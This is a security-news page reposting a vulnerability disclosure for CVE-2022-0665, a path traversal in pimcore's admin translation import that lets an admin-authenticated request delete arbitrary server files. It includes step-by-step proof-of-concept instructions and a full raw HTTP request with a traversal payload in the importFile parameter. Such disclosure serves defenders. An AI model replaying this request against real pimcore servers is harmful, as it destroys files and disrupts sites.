Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-0665: Path Traversal in pimcore

Path Traversal in GitHub repository pimcore/pimcore prior to 10.3.2.

CVE
Open in Source
#csrf#web#windows#google#js#git

Description

The application doesn’t perform a check/filter against the value of “importFile” parameter at endpoint "/admin/translation/import". After the API is executed, PHP unlink function will proceed to delete the file.

Proof of Concept

  • Step 1: Login as admin at https://10.x-dev.pimcore.fun/admin.

  • Step 2: Using burpsuite to proxy request. Go to Settings -> Admin Translations -> Import & Merge CSV

  • Step 3: Edit value of importFile in request call to /admin/translation/import

    POST /admin/translation/import?merge=2 HTTP/1.1 Host: 10.x-dev.pimcore.fun Cookie: pimcore_admin_sid=1; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDQ0ODI4MjMuODk3MTExLCJwdGciOnsiX20iOjEsIl9jIjoxNjQ0NDgxMjAxLCJfdSI6MTY0NDQ4MjgyMywidmk6c3J1IjpbN119LCJleHAiOjE2NDQ0ODQ2MjN9.0Ezd501szQiJryBsTcmEajyE0cKw3Jy0D7vnaIi0f7M; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDQ0ODI4MjMuODk3MjE4LCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6MX0sIl9jIjoxNjQ0NDgxMjAyLCJfdSI6MTY0NDQ4MTIwMn0sImV4cCI6MTY3NjAxODgyM30.QVPovPchi8Amu7U6HfloyPzaqWM9raWqTr8WyaODiHU; _pc_vis=bdd4fff7d63cd197; _pc_ses=1644481631796; _ga=GA1.4.1223340938.1644481632; _gid=GA1.4.1727336840.1644481632; PHPSESSID=8ec8b25fc8744112040d525dc3a0cff0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://10.x-dev.pimcore.fun/admin/?_dc=1644481466&perspective= X-Pimcore-Csrf-Token: 3940b07522d199209cfd8b6083f0959e0f907449 X-Pimcore-Extjs-Version-Major: 7 X-Pimcore-Extjs-Version-Minor: 0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 263 Origin: https://10.x-dev.pimcore.fun Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close

    importFile=…/…/…/…/…/…/…/…/…/var/www/html/vendor/pimcore/pimcore/lib/Model/AbstractModel.php&csvSettings={"delimiter":":","escapechar":"\","lineterminator":"\n","quotechar":"""}&domain=admin&delimiter=%3a&escapechar=%5C&lineterminator=%0a&quotechar=%22

  • Step 4: Logout and go to https://10.x-dev.pimcore.fun/admin, you will see error "Failed opening ‘/var/www/html/vendor/composer/…/pimcore/pimcore/lib/Model/AbstractModel.php’ for inclusion". Sorry for my mistake, can you revert https://10.x-dev.pimcore.fun.

  • PoC:

https://drive.google.com/file/d/17EtF8I3ChKL14uDxaelBa0GLeHq6APjy

https://drive.google.com/file/d/1JnffQheSMgnKeAaQjYQxMHxDwCS3UA80

Root-cause:

  • Path traversal: https://github.com/pimcore/pimcore/blob/master/bundles/AdminBundle/Controller/Admin/TranslationController.php#L71

  • File delete: https://github.com/pimcore/pimcore/blob/master/bundles/AdminBundle/Controller/Admin/TranslationController.php#L95

Impact

Attacker can delete any file on the server (successful file deletion depends on the current user is running web service)

Occurrences

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE